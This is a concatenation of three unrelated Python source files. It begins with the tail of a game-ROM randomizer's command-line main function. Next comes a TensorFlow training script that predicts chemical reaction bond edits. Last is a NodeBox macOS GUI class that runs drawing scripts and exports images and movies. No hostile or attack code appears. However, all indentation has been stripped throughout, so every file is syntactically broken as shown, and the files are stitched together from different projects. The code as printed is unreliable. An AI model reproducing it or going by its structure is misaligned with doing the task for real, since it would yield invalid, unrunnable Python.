iteminfo_list = logic.Logic(args, world_setup=worldSetup.WorldSetup()).iteminfo_list
for ii in sorted(iteminfo_list, key=lambda n: (n.location.dungeon if n.location.dungeon else -1, repr(n.metadata))):
if len(ii.OPTIONS) > 1:
f.write(";%r\n" % (ii.metadata))
f.write("Location:%s: \n" % (ii.nameId))
sys.exit(0)
if args.dump is not None or args.test:
print("Loading: %s" % (args.input_filename))
roms = [ROMWithTables(f) for f in [args.input_filename] + args.dump]
if args.spoilerformat == "none":
args.spoilerformat = "console"
try:
log = spoilerLog.SpoilerLog(args, roms)
log.output(args.spoiler_filename)
sys.exit(0)
except spoilerLog.RaceRomException:
print("Cannot read spoiler log for race rom")
sys.exit(1)
if args.seed:
try:
args.seed = binascii.unhexlify(args.seed)
except binascii.Error:
args.seed = args.seed.encode("ascii")
retry_count = 0
while True:
try:
r = randomizer.Randomizer(args, seed=args.seed)
seed = binascii.hexlify(r.seed).decode("ascii").upper()
break
except randomizer.Error:
if args.seed is not None:
print("Specified seed does not produce a valid result.")
sys.exit(1)
retry_count += 1
if retry_count > 100:
print("Randomization keeps failing, abort!")
sys.exit(1)
print("Failed, trying again: %d" % (retry_count))
print("Seed: %s" % (seed))
if __name__ == "__main__":
main()
|
nntrain.py | import tensorflow as tf
from utils.nn import linearND, linear
from mol_graph import atom_fdim as adim, bond_fdim as bdim, max_nb, smiles2graph_list as _s2g
from models import *
from ioutils import *
import math, sys, random
from collections import Counter
from optparse import OptionParser
from functools import partial
import threading
from multiprocessing import Queue
import pickle
NK = 20
NK0 = 10
parser = OptionParser()
parser.add_option("-t", "--data", dest="data_path")
parser.add_option("-m", "--save_dir", dest="save_path")
parser.add_option("-b", "--batch", dest="batch_size", default=20)
parser.add_option("-w", "--hidden", dest="hidden_size", default=100)
parser.add_option("-d", "--depth", dest="depth", default=1)
parser.add_option("-l", "--max_norm", dest="max_norm", default=5.0)
opts,args = parser.parse_args()
batch_size = int(opts.batch_size)
hidden_size = int(opts.hidden_size)
depth = int(opts.depth)
max_norm = float(opts.max_norm)
smiles2graph_batch = partial(_s2g, idxfunc=lambda x:x.GetIntProp('molAtomMapNumber') - 1)
session = tf.Session()
_input_atom = tf.placeholder(tf.float32, [batch_size, None, adim])
_input_bond = tf.placeholder(tf.float32, [batch_size, None, bdim])
_atom_graph = tf.placeholder(tf.int32, [batch_size, None, max_nb, 2])
_bond_graph = tf.placeholder(tf.int32, [batch_size, None, max_nb, 2])
_num_nbs = tf.placeholder(tf.int32, [batch_size, None])
_node_mask = tf.placeholder(tf.float32, [batch_size, None])
_src_holder = [_input_atom, _input_bond, _atom_graph, _bond_graph, _num_nbs, _node_mask]
_label = tf.placeholder(tf.int32, [batch_size, None])
_binary = tf.placeholder(tf.float32, [batch_size, None, None, binary_fdim])
#keep_prob = tf.placeholder(tf.float32)
q = tf.FIFOQueue(100, [tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.float32, tf.int32, tf.float32])
enqueue = q.enqueue(_src_holder + [_label, _binary])
input_atom, input_bond, atom_graph, bond_graph, num_nbs, node_mask, label, binary = q.dequeue()
input_atom.set_shape([batch_size, None, adim])
input_bond.set_shape([batch_size, None, bdim])
atom_graph.set_shape([batch_size, None, max_nb, 2])
bond_graph.set_shape([batch_size, None, max_nb, 2])
num_nbs.set_shape([batch_size, None])
node_mask.set_shape([batch_size, None])
label.set_shape([batch_size, None])
binary.set_shape([batch_size, None, None, binary_fdim])
node_mask = tf.expand_dims(node_mask, -1)
flat_label = tf.reshape(label, [-1])
bond_mask = tf.to_float(tf.not_equal(flat_label, INVALID_BOND))
flat_label = tf.maximum(0, flat_label)
graph_inputs = (input_atom, input_bond, atom_graph, bond_graph, num_nbs, node_mask)
with tf.variable_scope("encoder"):
atom_hiddens, _ = rcnn_wl_last(graph_inputs, batch_size=batch_size, hidden_size=hidden_size, depth=depth)
atom_hiddens1 = tf.reshape(atom_hiddens, [batch_size, 1, -1, hidden_size])
atom_hiddens2 = tf.reshape(atom_hiddens, [batch_size, -1, 1, hidden_size])
atom_pair = atom_hiddens1 + atom_hiddens2
att_hidden = tf.nn.relu(linearND(atom_pair, hidden_size, scope="att_atom_feature", init_bias=None) + linearND(binary, hidden_size, scope="att_bin_feature"))
att_score = linearND(att_hidden, 1, scope="att_scores")
att_score = tf.nn.sigmoid(att_score)
att_context = att_score * atom_hiddens1
att_context = tf.reduce_sum(att_context, 2)
att_context1 = tf.reshape(att_context, [batch_size, 1, -1, hidden_size])
att_context2 = tf.reshape(att_context, [batch_size, -1, 1, hidden_size])
att_pair = att_context1 + att_context2
pair_hidden = linearND(atom_pair, hidden_size, scope="atom_feature", init_bias=None) + linearND(binary, hidden_size, scope="bin_feature", init_bias=None) + linearND(att_pair, hidden_size, scope="ctx_feature")
pair_hidden = tf.nn.relu(pair_hidden)
pair_hidden = tf.reshape(pair_hidden, [batch_size, -1, hidden_size])
score = linearND(pair_hidden, 1, scope="scores")
score = tf.squeeze(score, [2])
bmask = tf.to_float(tf.equal(label, INVALID_BOND)) * 10000
_, topk = tf.nn.top_k(score - bmask, k=NK)
flat_score = tf.reshape(score, [-1])
loss = tf.nn.sigmoid_cross_entropy_with_logits(flat_score, tf.to_float(flat_label))
loss = tf.reduce_sum(loss * bond_mask)
_lr = tf.placeholder(tf.float32, [])
optimizer = tf.train.AdamOptimizer(learning_rate=_lr)
param_norm = tf.global_norm(tf.trainable_variables())
grads_and_vars = optimizer.compute_gradients(loss / batch_size) #+ beta * param_norm)
grads, var = zip(*grads_and_vars)
grad_norm = tf.global_norm(grads)
new_grads, _ = tf.clip_by_global_norm(grads, max_norm)
grads_and_vars = zip(new_grads, var)
backprop = optimizer.apply_gradients(grads_and_vars)
tf.global_variables_initializer().run(session=session)
size_func = lambda v: reduce(lambda x, y: x*y, v.get_shape().as_list())
n = sum(size_func(v) for v in tf.trainable_variables())
print "Model size: %dK" % (n/1000,)
queue = Queue()
data = []
with open(opts.data_path) as f:
for line in f:
items = line.split()
if items[1] != 'train': continue
react = items[0].split('>')[0]
edits = items[2]
data.append((react, edits))
print "Training set size:", len(data)
def read_data(train, coord):
it = 0
train_len = len(train)
while True:
src_batch, edit_batch = [], []
for i in xrange(batch_size):
react, edits = data[it]
src_batch.append(react)
edit_batch.append(edits)
it = (it + 1) % train_len
src_tuple = smiles2graph_batch(src_batch)
cur_bin, cur_label, sp_label = get_all_batch(zip(src_batch, edit_batch))
feed_map = {x:y for x,y in zip(_src_holder, src_tuple)}
feed_map.update({_label:cur_label, _binary:cur_bin})
session.run(enqueue, feed_dict=feed_map)
queue.put(sp_label)
coord.request_stop()
coord = tf.train.Coordinator()
t = threading.Thread(target=read_data, args=(data, coord))
t.start()
saver = tf.train.Saver()
it, sum_acc, sum_err, sum_gnorm = 0, 0.0, 0.0, 0.0
lr = 0.001
try:
while not coord.should_stop():
it += 1
_, cur_topk, pnorm, gnorm = session.run([backprop, topk, param_norm, grad_norm], feed_dict={_lr:lr})
sp_label = queue.get()
for i in xrange(batch_size):
pre = 0
for j in xrange(NK):
if cur_topk[i,j] in sp_label[i]:
pre += 1
if len(sp_label[i]) == pre: sum_err += 1
pre = 0
for j in xrange(NK0):
if cur_topk[i,j] in sp_label[i]:
pre += 1
if len(sp_label[i]) == pre: sum_acc += 1
sum_gnorm += gnorm
if it % 50 == 0:
print "Acc@10: %.4f, Acc@20: %.4f, Param Norm: %.2f, Grad Norm: %.2f" % (sum_acc / (50 * batch_size), sum_err / (50 * batch_size), pnorm, sum_gnorm / 50)
sys.stdout.flush()
sum_acc, sum_err, sum_gnorm = 0.0, 0.0, 0.0
if it % 10000 == 0:
lr *= 0.9
saver.save(session, opts.save_path + "/model.ckpt", global_step=it)
#print "Model Saved!"
break
except Exception as e:
print e
coord.request_stop(e)
finally:
saver.save(session, opts.save_path + "/model.final")
coord.request_stop()
coord.join([t])
|
__init__.py | import sys
import os
import traceback, linecache
import re
import objc
import time
import random
import EasyDialogs
from PyObjCTools import NibClassBuilder, AppHelper
from Foundation import *
from AppKit import *
from threading import Thread
from nodebox.gui.mac.ValueLadder import MAGICVAR
from nodebox.gui.mac import PyDETextView
from nodebox.gui.mac.util import errorAlert
from nodebox import util
from nodebox.util import QTSupport
from nodebox import graphics
# AppleScript enumerator codes for PDF and Quicktime export
PDF = 0x70646678 # 'pdfx'
QUICKTIME = 0x71747878 # 'qt '
VERY_LIGHT_GRAY = NSColor.blackColor().blendedColorWithFraction_ofColor_(
0.95, NSColor.whiteColor())
NibClassBuilder.extractClasses("MainMenu")
NibClassBuilder.extractClasses("NodeBoxDocument")
NibClassBuilder.extractClasses("ExportImageAccessory")
NibClassBuilder.extractClasses("ExportMovieAccessory")
NibClassBuilder.extractClasses("ProgressBarSheet")
from nodebox.gui.mac.dashboard import *
from nodebox.gui.mac.progressbar import ProgressBarController
class ExportCommand(NSScriptCommand):
pass
class OutputFile(object):
def __init__(self, data, isErr=False):
self.data = data
self.isErr = isErr
def write(self, data):
if isinstance(data, str):
try:
data = unicode(data, "utf_8", "replace")
except UnicodeDecodeError:
data = "XXX " + repr(data)
self.data.append((self.isErr, data))
# class defined in NodeBoxDocument.nib
class NodeBoxDocument(NibClassBuilder.AutoBaseClass):
# the actual base class is NSDocument
# The following outlets are added to the class:
# graphicsView
# outputView
# textView
# variablesController
# dashboardController
# The ExportImageAccessory adds:
# exportImageAccessory
# exportImageFormat
# exportImagePageCount
# The ExportMovieAccessory adds:
# exportMovieAccessory
# exportMovieFrame
# exportMovieFps
# When the PageCount accessory is loaded, we also add:
# pageCount
# pageCountAccessory
# When the ExportSheet is loaded, we also add:
# exportSheet
# exportSheetIndicator
path = None
exportDir = None
magicvar = None # Used for value ladders.
_code = None
vars = []
movie = None
def windowNibName(self):
return "NodeBoxDocument"
def init(self):
self = super(NodeBoxDocument, self).init()
nc = NSNotificationCenter.defaultCenter()
nc.addObserver_selector_name_object_(self, "textFontChanged:", "PyDETextFontChanged", None)
self.namespace = {}
self.canvas = graphics.Canvas()
self.context = graphics.Context(self.canvas, self.namespace)
self.animationTimer = None
self.__doc__ = {}
self._pageNumber = 1
self._frame = 150
self.fullScreen = None
self._seed = time.time()
self.currentView = self.graphicsView
return self
def close(self):
self.stopScript_()
super(NodeBoxDocument, self).close()
def __del__(self):
nc = NSNotificationCenter.defaultCenter()
nc.removeObserver_name_object_(self, "PyDETextFontChanged", None)
# text view has a couple of circular refs, it can let go of them now
self.textView._cleanup()
def textFontChanged_(self, notification):
font = PyDETextView.getBasicTextAttributes()[NSFontAttributeName]
self.outputView.setFont_(font)
def readFromFile_ofType_(self, path, tp):
if self.textView is None:
# we're not yet fully loaded
self.path = path
else:
# "revert"
self.readFromUTF8(path)
return True
def writeToFile_ofType_(self, path, tp):
f = file(path, "w")
text = self.textView.string()
f.write(text.encode("utf8"))
f.close()
return True
def windowControllerDidLoadNib_(self, controller):
if self.path:
self.readFromUTF8(self.path)
font = PyDETextView.getBasicTextAttributes()[NSFontAttributeName]
self.outputView.setFont_(font)
self.textView.window().makeFirstResponder_(self.textView)
self.windowControllers()[0].setWindowFrameAutosaveName_("NodeBoxDocumentWindow")
def readFromUTF8(self, path):
f = file(path)
text = unicode(f.read(), "utf_8")
f.close()
self.textView.setString_(text)
self.textView.usesTabs = "\t" in text
def cleanRun(self, fn, newSeed = True):
# Prepare everything for running the script
self.prepareRun()
# Run the actual script
if self.fastRun(fn, newSeed):
# Build the interface
self.vars = self.namespace["_ctx"]._vars
if len(self.vars) > 0:
self.buildInterface_()
return True
return False
def prepareRun(self):
# Compile the script
success, output = self._boxedRun(self._compileScript)
self._flushOutput(output)
if not success:
return False
# Initialize the namespace
self._initNamespace()
# Reset the pagenum
self._pageNum = 1
# Reset the frame
self._frame = 1
self.speed = self.canvas.speed = None
def fastRun(self, fn, newSeed = False):
# Check if there is code to run
if self._code is None:
return False
# Clear the canvas
self.canvas.clear()
# Generate a new seed, if needed
if newSeed:
self._seed = time.time()
random.seed(self._seed)
# Set the mouse position
window = self.currentView.window()
pt = window.mouseLocationOutsideOfEventStream()
mx, my = window.contentView().convertPoint_toView_(pt, self.currentView)
# Hack: mouse coordinates are flipped vertically in FullscreenView.
# This flips them back.
if isinstance(self.currentView, FullscreenView):
my = self.currentView.bounds()[1][1] - my
self.namespace["MOUSEX"], self.namespace["MOUSEY"] = mx, my
self.namespace["mousedown"] = self.currentView.mousedown
self.namespace["keydown"] = self.currentView.keydown
self.namespace["key"] = self.currentView.key
self.namespace["keycode"] = self.currentView.keycode
self.namespace["scrollwheel"] = self.currentView.scrollwheel
self.namespace["wheeldelta"] = self.currentView.wheeldelta
# Reset the context
self.context._resetContext()
# Initalize the magicvar
self.namespace[MAGICVAR] = self.magicvar
# Set the pagenum
self.namespace['PAGENUM'] = self._pageNumber
# Set the frame
self.namespace['FRAME'] = self._frame
# Run the script
success, output = self._boxedRun(fn)
self._flushOutput(output)
if not success:
return False
# Display the output of the script
self.currentView.setCanvas(self.canvas)
return True
def handleRunScriptCommand_(self, command):
self.runScript_(self)
def runFullscreen_(self):
if self.fullScreen is not None: return
self.stopScript_()
self.currentView = FullscreenView.alloc().init()
self.currentView.canvas = None
fullRect = NSScreen.mainScreen().frame()
self.fullScreen = FullscreenWindow.alloc().init(fullRect)
self.fullScreen.setContentView_(self.currentView)
self.fullScreen.makeKeyAndOrderFront_(self)
self.fullScreen.makeFirstResponder_(self.currentView)
NSMenu.setMenuBarVisible_(False)
NSCursor.hide()
self._runScript()
def runScript_(self, compile=True, newSeed=True):
if self.fullScreen is not None: return
self.currentView = self.graphicsView
self._runScript(compile, newSeed)
def _runScript(self, compile=True, newSeed=True):
if not self.cleanRun(self._execScript):
pass
# Check whether we are dealing with animation
if self.canvas.speed is not None:
if not self.namespace.has_key("draw"):
errorAlert("Not a proper NodeBox animation",
"NodeBox animations should have at least a draw() method.")
return
# Check if animationTimer is already running
if self.animationTimer is not None:
self.stopScript_()
self.speed = self.canvas.speed
# Run setup routine
if self.namespace.has_key("setup"):
self.fastRun(self.namespace["setup"])
window = self.currentView.window()
window.makeFirstResponder_(self.currentView)
# Start the timer
self.animationTimer = NSTimer.scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(
1.0 / self.speed, self, objc.selector(self.doFrame_, signature="v@:@"), None, True)
def runScriptFast_(self):
if self.animationTimer is None:
self.fastRun(self._execScript)
else:
# XXX: This can be sped up. We just run _execScript to get the
# method with __MAGICVAR__ into the namespace, and execute
# that, so it should only be called once for animations.
self.fastRun(self._execScript)
self.fastRun(self.namespace["draw"])
def doFrame_(self):
self.fastRun(self.namespace["draw"], newSeed=True)
self._frame += 1
def source(self):
return self.textView.string()
def setSource_(self, source):
self.textView.setString_(source)
def stopScript_(self):
if self.animationTimer is not None:
self.animationTimer.invalidate()
self.animationTimer = None
if self.fullScreen is not None:
self.currentView = self.graphicsView
self.fullScreen = None
NSMenu.setMenuBarVisible_(True)
NSCursor.unhide()
self.textView.hideValueLadder()
window = self.textView.window()
window.makeFirstResponder_(self.textView)
def _compileScript(self, source=None):
if source is None:
source = self.textView.string()
#linecache.clearcache()
#linecache.cache[fileName] = len(source), 0, source.splitlines(True), fileName
self._code = None
self._code = compile(source + "\n\n", self.scriptName, "exec")
def _initNamespace(self):
self.namespace.clear()
# Add everything from the namespace
for name in graphics.__all__:
self.namespace[name] = getattr(graphics, name)
for name in util.__all__:
self.namespace[name] = getattr(util, name)
# Add everything from the context object
self.namespace["_ctx"] = self.context
for attrName in dir(self.context):
self.namespace[attrName] = getattr(self.context, attrName)
# Add the document global
self.namespace["__doc__"] = self.__doc__
# Add the page number
self.namespace["PAGENUM"] = self._pageNumber
# Add the frame number
self.namespace["FRAME"] = self._frame
# Add the magic var
self.namespace[MAGICVAR] = self.magicvar
# XXX: will be empty after reset.
#for var in self.vars:
# self.namespace[var.name] = var.value
def _execScript(self):
exec self._code in self.namespace
self.__doc__ = self.namespace.get("__doc__", self.__doc__)
def _boxedRun(self, method, args=[]):
"""
Runs the given method in a boxed environment.
Boxed environments:
- Have their current directory set to the directory of the file
- Have their argument set to the filename
- Have their outputs redirect to an output stream.
Returns:
A tuple containing:
- A boolean indicating whether the run was successful
- The OutputFile
"""
self.scriptName = self.fileName()
libDir = os.path.join(os.getenv("HOME"), "Library", "Application Support", "NodeBox")
if not self.scriptName:
curDir = os.getenv("HOME")
self.scriptName = "<untitled>"
else:
curDir = os.path.dirname(self.scriptName)
save = sys.stdout, sys.stderr
saveDir = os.getcwd()
saveArgv = sys.argv
sys.argv = [self.scriptName]
if os.path.exists(libDir):
sys.path.insert(0, libDir)
os.chdir(curDir)
sys.path.insert(0, curDir)
output = []
sys.stdout = OutputFile(output, False)
sys.stderr = OutputFile(output, True)
self._scriptDone = False
try:
if self.animationTimer is None:
# Creating a thread is a heavy operation,
# don't install it when animating, where speed is crucial
t = Thread(target=self._userCancelledMonitor, name="UserCancelledMonitor")
t.start()
try:
method(*args)
except KeyboardInterrupt:
self.stopScript_()
except:
etype, value, tb = sys.exc_info()
if tb.tb_next is not None:
tb = tb.tb_next # skip the frame doing the exec
traceback.print_exception(etype, value, tb)
etype = value = tb = None
return False, output
finally:
self._scriptDone = True
sys.stdout, sys.stderr = save
os.chdir(saveDir)
sys.path.remove(curDir)
try:
sys.path.remove(libDir)
except ValueError:
pass
sys.argv = saveArgv
#self._flushOutput()
return True, output
# from Mac/Tools/IDE/PyEdit.py
def _userCancelledMonitor(self):
import time
from signal import SIGINT
from Carbon import Evt
while not self._scriptDone:
if Evt.CheckEventQueueForUserCancel():
# Send a SIGINT signal to ourselves.
# This gets delivered to the main thread,
# cancelling the running script.
os.kill(os.getpid(), SIGINT)
break
time.sleep(0.25)
def _flushOutput(self, output):
outAttrs = PyDETextView.getBasicTextAttributes()
errAttrs = outAttrs.copy()
# XXX err color from user defaults...
errAttrs[NSForegroundColorAttributeName] = NSColor.redColor()
outputView = self.outputView
outputView.setSelectedRange_((outputView.textStorage().length(), 0))
lastErr = None
for isErr, data in output:
if isErr != lastErr:
attrs = [outAttrs, errAttrs][isErr]
outputView.setTypingAttributes_(attrs)
lastErr = isErr
outputView.insertText_(data)
# del self.output
def copyImageAsPDF_(self, sender):
pboard = NSPasteboard.generalPasteboard()
# graphicsView implements the pboard delegate method to provide the data
pboard.declareTypes_owner_([NSPDFPboardType,NSPostScriptPboardType,NSTIFFPboardType], self.graphicsView)
def exportAsImage_(self, sender):
exportPanel = NSSavePanel.savePanel()
exportPanel.setRequiredFileType_("pdf")
exportPanel.setNameFieldLabel_("Export To:")
exportPanel.setPrompt_("Export")
exportPanel.setCanSelectHiddenExtension_(True)
if not NSBundle.loadNibNamed_owner_("ExportImageAccessory", self):
NSLog("Error -- could not load ExportImageAccessory.")
self.exportImagePageCount.setIntValue_(1)
exportPanel.setAccessoryView_(self.exportImageAccessory)
path = self.fileName()
if path:
dirName, fileName = os.path.split(path)
fileName, ext = os.path.splitext(fileName)
fileName += ".pdf"
else:
dirName, fileName = None, "Untitled.pdf"
# If a file was already exported, use that folder as the default.
if self.exportDir is not None:
dirName = self.exportDir
exportPanel.beginSheetForDirectory_file_modalForWindow_modalDelegate_didEndSelector_contextInfo_(
dirName, fileName, NSApp().mainWindow(), self,
"exportPanelDidEnd:returnCode:contextInfo:", 0)
def exportPanelDidEnd_returnCode_contextInfo_(self, panel, returnCode, context):
if returnCode:
fname = panel.filename()
self.exportDir = os.path.split(fname)[0] # Save the directory we exported to.
pages = self.exportImagePageCount.intValue()
format = panel.requiredFileType()
panel.close()
self.doExportAsImage(fname, format, pages)
exportPanelDidEnd_returnCode_contextInfo_ = objc.selector(exportPanelDidEnd_returnCode_contextInfo_,
signature="v@:@ii")
def exportImageFormatChanged_(self, sender):
image_formats = ('pdf', 'png', 'tiff', 'jpg')
panel = sender.window()
panel.setRequiredFileType_(image_formats[sender.indexOfSelectedItem()])
def doExportAsImage(self, fname, format, pages=1):
basename, ext = os.path.splitext(fname)
# When saving one page (the default), just save the current graphics
# context. When generating multiple pages, we run the script again
# (so we don't use the current displayed view) for the first page,
# and then for every next page.
if pages == 1:
if not self.graphicsView.pdfData:
self.runScript_()
if format == 'pdf':
pdfData = self.graphicsView.pdfData
pdfData.writeToFile_atomically_(fname , False)
else:
self.canvas.save(fname, format)
elif pages > 1:
pb = ProgressBarController.alloc().init()
pb.begin("Generating %s PDF files..." % pages, pages)
try:
if not self.cleanRun(self._execScript): return
self._pageNumber = 1
self._frame = 1
# If the speed is set, we are dealing with animation
if self.canvas.speed is None:
for i in range(pages):
if i > 0: # Run has already happened first time
self.fastRun(self._execScript, newSeed=True)
counterAsString = "-%5d" % self._pageNumber
counterAsString = counterAsString.replace(' ', '0')
exportName = basename + counterAsString + ext
if ext == '.pdf':
pdfData = self.graphicsView.pdfData
pdfData.writeToFile_atomically_(exportName, False)
else:
self.canvas.save(exportName, format)
self.graphicsView.setNeedsDisplay_(True)
self._pageNumber += 1
self._frame += 1
pb.inc()
else:
if self.namespace.has_key("setup"):
self.fastRun(self.namespace["setup"])
for i in range(pages):
self.fastRun(self.namespace["draw"], newSeed=True)
counterAsString = "-%5d" % self._pageNumber
counterAsString = counterAsString.replace(' ', '0')
exportName = basename + counterAsString + ext
if ext == '.pdf':
pdfData = self.graphicsView.pdfData
pdfData.writeToFile_atomically_(exportName, False)
else:
self.canvas.save(exportName, format)
self.graphicsView.setNeedsDisplay_(True)
self._pageNumber += 1
self._frame += 1
pb.inc()
#self.exportSheetProgress.setDoubleValue_(i)
except KeyboardInterrupt:
pass
pb.end()
del pb
self._pageNumber = 1
self._frame = 1
def handleExportScriptCommand_(self, command):
print "ARGS"
print command.arguments()
print "FFF"
try:
print command.arguments()['File']
print command.arguments()['File'].__class__.__name__
except KeyError:
print "F NOT FOUND"
print "KEYS"
print command.arguments().allKeys()
print "VALUES"
print command.arguments().allValues()
print "CLASS"
print command.__class__.__name__
if command:
args = command.arguments()
ftype = PDF
fcount = None
fps = 30
if args.has_key('ftype'):
ftype = args['ftype']
fname = None
if args.has_key('fname'):
f = args['fname']
if f.isFileURL():
fname = f.path()
if args.has_key('frames'):
fcount = args['frames']
if args.has_key('pages'):
fcount = args['pages']
if args.has_key('framerate'):
fps = args['framerate']
print fname
if fname:
if ftype == PDF:
if fcount is None: fcount = 1
self.doExportToPDF(fname, fcount)
elif ftype == QUICKTIME:
if fcount is None: fcount = 60
self.doExportToQuickTime(fname, fcount, fps)
def exportAsMovie_(self, sender):
exportPanel = NSSavePanel.savePanel()
exportPanel.setRequiredFileType_("pdf")
exportPanel.setNameFieldLabel_("Export To:")
exportPanel.setPrompt_("Export")
exportPanel.setCanSelectHiddenExtension_(True)
exportPanel.setAllowedFileTypes_(["mov"])
if not NSBundle.loadNibNamed_owner_("ExportMovieAccessory", self):
NSLog("Error -- could not load ExportMovieAccessory.")
self.exportMovieFrames.setIntValue_(150)
self.exportMovieFps.setIntValue_(30)
exportPanel.setAccessoryView_(self.exportMovieAccessory)
path = self.fileName()
if path:
dirName, fileName = os.path.split(path)
fileName, ext = os.path.splitext(fileName)
fileName += ".mov"
else:
dirName, fileName = None, "Untitled.mov"
# If a file was already exported, use that folder as the default.
if self.exportDir is not None:
dirName = self.exportDir
exportPanel.beginSheetForDirectory_file_modalForWindow_modalDelegate_didEndSelector_contextInfo_(
dirName, fileName, NSApp().mainWindow(), self,
"qtPanelDidEnd:returnCode:contextInfo:", 0)
def qtPanelDidEnd_returnCode_contextInfo_(self, panel, returnCode, context):
if returnCode:
fname = panel.filename()
self.exportDir = os.path.split(fname)[0] # Save the directory we exported to.
frames = self.exportMovieFrames.intValue()
fps = self.exportMovieFps.floatValue()
panel.close()
if frames <= 0 or fps <= 0: return
self.doExportAsMovie(fname, frames, fps)
qtPanelDidEnd_returnCode_contextInfo_ = objc.selector(qtPanelDidEnd_returnCode_contextInfo_,
signature="v@:@ii")
def doExportAsMovie(self, fname, frames=60, fps=30):
try:
os.unlink(fname)
except:
pass
try:
fp = open(fname, 'w')
fp.close()
except:
errorAlert("File Error", "Could not create file '%s'. Perhaps it is locked or busy." % fname)
return
movie = None
pb = ProgressBarController.alloc().init()
pb.begin("Generating %s frames..." % frames, frames)
try:
if not self.cleanRun(self._execScript): return
self._pageNumber = 1
self._frame = 1
movie = QTSupport.Movie(fname, fps)
# If the speed is set, we are dealing with animation
if self.canvas.speed is None:
for i in range(frames):
if i > 0: # Run has already happened first time
self.fastRun(self._execScript, newSeed=True)
movie.add(self.canvas)
self.graphicsView.setNeedsDisplay_(True)
pb.inc()
self._pageNumber += 1
self._frame += 1
else:
if self.namespace.has_key("setup"):
self.fastRun(self.namespace["setup"])
for i in range(frames):
self.fastRun(self.namespace["draw"], newSeed=True)
movie.add(self.canvas)
self.graphicsView.setNeedsDisplay_(True)
pb.inc()
self._pageNumber += 1
self._frame += 1
except KeyboardInterrupt:
pass
pb.end()
del pb
movie.save()
self._pageNumber = 1
self._frame = 1
def printDocument_(self, sender):
op = NSPrintOperation.printOperationWithView_printInfo_(self.graphicsView, self.printInfo())
op.runOperationModalForWindow_delegate_didRunSelector_contextInfo_(
NSApp().mainWindow(), self, "printOperationDidRun:success:contextInfo:",
0)
def printOperationDidRun_success_contextInfo_(self, op, success, info):
if success:
self.setPrintInfo_(op.printInfo())
printOperationDidRun_success_contextInfo_ = objc.selector(printOperationDidRun_success_contextInfo_,
signature="v@:@ci")
def buildInterface_(self):
self.dashboardController.buildInterface_(self.vars)
def validateMenuItem_(self, menuItem):
if menuItem.action() in ("exportAsImage:", "exportAsMovie:"):
return self.canvas is not None
return True
class FullscreenWindow(NibClassBuilder.AutoBaseClass):
def init(self, fullRect):
super(FullscreenWindow, self).initWithContentRect_styleMask_backing_defer_(fullRect, NSBorderlessWindowMask, NSBackingStoreBuffered, True)
return self
def canBecomeKeyWindow(self):
return True
class FullscreenView(NibClassBuilder.AutoBaseClass):
def init(self):
super(FullscreenView, self).init()
self.mousedown = False
self.keydown = False
self.key = None
self.keycode = None
self.scrollwheel = False
self.wheeldelta = 0.0
return self
def setCanvas(self, canvas):
self.canvas = canvas
self.setNeedsDisplay_(True)
if not hasattr(self, "screenRect"):
self.screenRect = NSScreen.mainScreen().frame()
cw, ch = self.canvas.size
sw, sh = self.screenRect[1]
self.scalingFactor = calc_scaling_factor(cw, ch, sw, sh)
nw, nh = cw * self.scalingFactor, ch * self.scalingFactor
self.scaledSize = nw, nh
self.dx = (sw - nw) / 2.0
self.dy = (sh - nh) / 2.0
def drawRect_(self, rect):
NSGraphicsContext.currentContext().saveGraphicsState()
NSColor.blackColor().set()
NSRectFill(rect)
if self.canvas is not None:
t = NSAffineTransform.transform()
t.translateXBy_yBy_(self.dx, self.dy)
t.scaleBy_(self.scalingFactor)
t.concat()
clip = NSBezierPath.bezierPathWithRect_( ((0, 0), (self.canvas.width, self.canvas.height)) )
clip.addClip()
self.canvas.draw()
NSGraphicsContext.currentContext().restoreGraphicsState()
def isFlipped(self):
return True
def mouseDown_(self, event):
self.mousedown = True
def mouseUp_(self, event):
self.mousedown = False
def keyDown_(self, event):
self.keydown = True
self.key = event.characters()
self.keycode = event.keyCode()
def keyUp_(self, event):
self.keydown = False
self.key = event.characters()
self.keycode = event.keyCode()
def scrollWheel_(self, event):
self.scrollwheel = True
self.wheeldelta = event.deltaY()
def canBecomeKeyView(self):
return True
def acceptsFirstResponder(self):
return True
def calc_scaling_factor(width, height, maxwidth, maxheight):
if width > height:
return float(maxwidth) / width
else:
return float(maxheight) / height
# class defined in NodeBoxGraphicsView.nib
class NodeBoxGraphicsView(NibClassBuilder.AutoBaseClass):
# the actual base class is NSView
# The following outlets are added to the class:
# document
def awakeFromNib(self):
self.canvas = None
self._image = None
self._dirty = False
self.mousedown = False
self.keydown = False
self.key = None
self.keycode = None
self.scrollwheel = False
self.wheeldelta = 0.0
self.setFrameSize_( (graphics.DEFAULT_WIDTH, graphics.DEFAULT_HEIGHT) )
self.setFocusRingType_(NSFocusRingTypeExterior)
if self.superview() is not None:
self.superview().setBackgroundColor_(VERY_LIGHT_GRAY)
def setCanvas(self, canvas):
self.canvas = canvas
if self.frame()[1] != self.canvas.size:
self.setFrameSize_(self.canvas.size)
self.markDirty()
def markDirty(self, redraw=True):
self._dirty = True
if redraw:
self.setNeedsDisplay_(True)
def setFrameSize_(self, size):
self._image = None
NSView.setFrameSize_(self, size)
def isOpaque(self):
return False
def isFlipped(self):
return True
def drawRect_(self, rect):
if self.canvas is not None:
NSGraphicsContext.currentContext().saveGraphicsState()
try:
self.canvas.draw()
except:
# A lot of code just to display the error in the output view.
etype, value, tb = sys.exc_info()
if tb.tb_next is not None:
tb = tb.tb_next # skip the frame doing the exec
traceback.print_exception(etype, value, tb)
data = "".join(traceback.format_exception(etype, value, tb))
attrs = PyDETextView.getBasicTextAttributes()
attrs[NSForegroundColorAttributeName] = NSColor.redColor()
outputView = self.document.outputView
outputView.setSelectedRange_((outputView.textStorage().length(), 0))
outputView.setTypingAttributes_(attrs)
outputView.insertText_(data)
NSGraphicsContext.currentContext().restoreGraphicsState()
def _updateImage(self):
if self._dirty:
self._image = self.canvas._nsImage
self._dirty = False
# pasteboard delegate method
def pasteboard_provideDataForType_(self, pboard, type):
if NSPDFPboardType:
pboard.setData_forType_(self.pdfData, NSPDFPboardType)
elif NSPostScriptPboardType:
pboard.setData_forType_(self.epsData, NSPostScriptPboardType)
elif NSTIFFPboardType:
pboard.setData_forType_(self.tiffData, NSTIFFPboardType)
def _get_pdfData(self):
if self.canvas:
return self.dataWithPDFInsideRect_(((0, 0), self.canvas.size))
pdfData = property(_get_pdfData)
def _get_epsData(self):
if self.canvas:
return self.dataWithEPSInsideRect_(((0, 0), self.canvas.size))
